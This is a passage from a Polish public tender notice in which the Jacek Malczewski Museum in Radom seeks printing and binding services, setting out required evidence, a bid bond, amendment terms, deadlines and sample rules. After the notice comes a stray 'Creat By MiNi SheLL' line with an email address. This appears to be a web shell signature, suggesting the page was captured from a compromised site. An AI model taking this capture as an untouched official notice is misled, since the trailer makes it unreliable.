przygotowania do druku z oprogramowaniem graficznym (np. Adobe InDesign),<br/>• sprzętem do wykończenia publikacji, w tym gilotyną oraz urządzeniem do bigowania i falcowania.<br/>Warunek III.<br/>Osoby zdolne do wykonania zamówienia<br/>Wykonawca musi wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia, w tym co najmniej:<br/>•	Specjalistą ds. składu i korekty – z minimum 2 letnie doświadczenie w składzie i korekcie publikacji wielostronicowych.<br/>•	Specjalista ds. druku i oprawy – z minimum 3 letnie doświadczenie w druku oraz wykończeniu publikacji, w tym szyciu i klejeniu książek lub katalogów . <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.1. Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania, o których mowa <br/>w art. 108 ust. 1 oraz 109 ust. 1 pkt 4, 5, 7, 8, 10 ustawy Pzp. <br/>1.2. Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji<br/> i konsumentów (t.j. Dz. U. z 2023 r. poz. 1689 ze zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz<br/> z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. <br/>1.3. Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu wstępnym, <br/>w zakresie podstaw wykluczenia z postępowania, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. 2023 poz. 1497).<br/>Uwaga: Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub zawodowych albo sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy, przedstawienia podmiotowego środka dowodowego,<br/> o którym mowa w pkt 1.1 i 1.3, dotyczącego tych podmiotów, potwierdzającego, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.1. Wykaz dostaw lub usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi te zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie. Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy. Wykazane usługi muszą być porównywalne z przedmiotem zamówienia pod względem zakresu, wartości i charakteru. Okres 3 lat liczy się wstecz od dnia, w którym upływa termin składania ofert. <br/>2.2. Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami. Wykaz osób powinien być przedstawiony w formie oświadczenia wykonawcy.<br/>2.3. Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacja o podstawie do dysponowania tymi zasobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający wymaga, aby Wykonawca złożył wraz z ofertą następujące przedmiotowe środki dowodowe potwierdzające, że oferowane usługi spełniają wymagania określone w SWZ. Przedmiotowe środki dowodowe powinny być złożone wraz z ofertą.<br/>2.	Rodzaje wymaganych środków dowodowych:<br/>1)	Próbki wykonanych materiałów drukowanych:<br/>	Szczegółowe zasady dotyczące sposobu składania próbek określono w Rozdziale XIV-Sposób oraz termin składania ofert. <br/>	Próbki muszą potwierdzać zastosowanie odpowiednich technik druku, materiałów (papier, tusz) oraz jakości wykończenia (odpowiednia rozdzielczość, kolorystyka, uszlachetnienia).<br/>	Próbki podlegają ocenie zgodnie z kryteriami jakości wskazanymi w Rozdziale XVII SWZ.<br/>2)	Specyfikacje techniczne oferowanych usług:<br/>	Opis technologii druku (np. offsetowy, cyfrowy, wieloformatowy),<br/>	Informacja o gramaturze papieru, rodzajach oprawy, technikach wykończenia.<br/>3)	Certyfikaty jakości:<br/>	Zamawiający żąda złożenia jednego z certyfikatów: ISO 9001 lub ISO 14001 lub równoważny.<br/>3.	Wymogi formalne:<br/>	Środki dowodowe powinny być aktualne i przedstawione w formie oryginałów lub kopii poświadczonych za zgodność z oryginałem,<br/>	W przypadku dokumentów w języku obcym należy dostarczyć tłumaczenie na język polski. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 	Możliwość wezwania Wykonawcy do uzupełnienia braków lub złożenia wyjaśnień zgodnie z art. 107 ust. 2 i ust.4 PZP z zastrzeżeniem przepisu art.107 ust.3 Pzp.<br/>Sankcje:<br/>	Brak przedmiotowych środków dowodowych lub ich niezgodność z wymaganiami może skutkować odrzuceniem oferty,<br/>	Możliwość wezwania do uzupełnienia zgodnie z art. 107 ust. 2 PZP z zastrzeżeniem przepisu art.107 ust.3 Pzp. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 2.	Dokumenty składane wraz z ofertą:<br/>•	Formularz cenowy zgodnie z załącznikiem Nr 1 do SWZ.<br/>•	Odpisy z KRS, CEIDG lub inne równoważne dokumenty potwierdzające umocowanie do reprezentowania Wykonawcy,<br/>•	Pełnomocnictwo (jeśli dotyczy), <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wymaganie wniesienia wadium:<br/>W niniejszym postępowaniu Zamawiający wymaga wniesienia wadium w kwocie 4 329,00 PLN. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> C. Oferta wspólna<br/>1.	W przypadku składania oferty wspólnej każdy z Wykonawców składa osobne oświadczenia dotyczące podstaw wykluczenia oraz spełniania warunków udziału w postępowaniu.<br/>2.	Wspólnicy spółki cywilnej traktowani są jako Wykonawcy składający ofertę wspólną.<br/>3.	Wynagrodzenie należne Wykonawcy będzie wpłacane na konto podmiotu wyznaczonego jako Lider. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	W szczególności Zamawiający przewiduje możliwość zmiany postanowień umowy w przypadku wystąpienia następujących okoliczności:<br/>1)	zmiana terminu realizacji umowy – w przypadku: <br/>a)	wystąpienia siły wyższej, uniemożliwiającej wykonanie przedmiotu umowy w pierwotnym terminie, <br/>b) opóźnienia w przekazaniu przez Zamawiającego danych lub materiałów niezbędnych do realizacji przedmiotu umowy, <br/>c) wstrzymania realizacji przedmiotu umowy przez Zamawiającego z przyczyn niezależnych od Wykonawcy.<br/>2)	Zmiana wynagrodzenia Wykonawcy – w przypadku: <br/>a)	Zmiana wynagrodzenia z tytułu waloryzacji kosztów, w przypadkach opisanych w § 15 niniejszej umowy, w szczególności w wyniku:<br/>•	Zmiany cen kluczowych materiałów (papier, materiały introligatorskie) lub usług niezbędnych do realizacji zamówienia.<br/>•	Zmiany wskaźnika inflacji ogłaszanego przez Główny Urząd Statystyczny (CPI).<br/>b)	Zmiana wynagrodzenia z tytułu zmiany stawki podatku VAT.<br/>c)	Zmiana wynagrodzenia wynikająca z konieczności dostosowania liczby zamawianych prac lub ich zakresu do rzeczywistych potrzeb Zamawiającego, przy czym wartość zmiany nie może przekroczyć 10% pierwotnej wartości umowy netto.<br/>d)	Zmiana wynagrodzenia w przypadku wzrostu kosztów związanych z zatrudnianiem personelu na podstawie umowy o pracę, wynikająca z:<br/>•	Zmian przepisów prawa pracy lub wynagrodzeń minimalnych.<br/>•	Konieczności zwiększenia liczby pracowników zatrudnionych na podstawie umowy<br/> o pracę w związku z wymaganiami Zamawiającego lub zmianami organizacyjnymi Wykonawcy.<br/>•	zmiany przepisów prawa mających wpływ na koszty realizacji umowy, <br/>3)	Zmiana sposobu realizacji umowy: Możliwość zmiany sposobu realizacji w przypadku:<br/>a)	Konieczności dostosowania do zmienionych przepisów prawa lub decyzji organów administracji.<br/>b)	Wprowadzenia nowych rozwiązań technologicznych, które zwiększają efektywność lub jakość realizacji zamówienia.<br/>c)	Zmiany wymagań technicznych lub organizacyjnych Zamawiającego.<br/>4)	Zmiana podwykonawców – w przypadku: <br/>a)	wprowadzenia nowego podwykonawcy lub zmiany zakresu podwykonawstwa, za uprzednią zgodą Zamawiającego, <br/>b) rezygnacji z podwykonawcy i wykonania danego zakresu prac bezpośrednio przez Wykonawcę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-10 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa oferte za pośrednictwem interaktywnego formularza oferty udostepnionego na platformie e-Zamówienia, z wyjątkiem Próbek wydruku.Próbki publikacji muszą zostać dostarczone w formie fizycznej na adres Zamawiającego: Muzeum Jacka Malczewskiego w Radomiu, ul. Rynek 11, 26-600 Radom, z dopiskiem: „Próbki do postępowania nr [ MJM-ZP.26.1/U/2025]”.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-10 12:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ocena ofert w kryterium „Jakość wykonania” będzie oparta na analizie dostarczonych przez Wykonawcę próbek publikacji. <br/>Próbki publikacji muszą zostać dostarczone w formie fizycznej na adres Zamawiającego:<br/>Muzeum Jacka Malczewskiego w Radomiu, ul. Rynek 11, 26-600 Radom, z dopiskiem: „Próbki do postępowania nr [ MJM-ZP.26.1/U/2025]”.<br/>Wymogi dotyczące próbek:<br/>o	Wykonawca jest zobowiązany dostarczyć 3 próbki publikacji wielostronicowych wykonanych wcześniej, spełniających poniższe wymagania: <br/>•	Publikacje wielostronicowe, takie jak książki, katalogi, albumy lub broszury (minimum 100 stron każda).<br/>•	Wydrukowane w pełnym kolorze (CMYK).<br/>•	Wykonane z zastosowaniem różnych rodzajów opraw (np. klejonej, szytej).<br/>o	Każda próbka musi być oznaczona wyłącznie numerem lub innym neutralnym oznaczeniem, które zapewni anonimowość podczas oceny jakości.

Creat By MiNi SheLL
Email: jattceo@gmail.com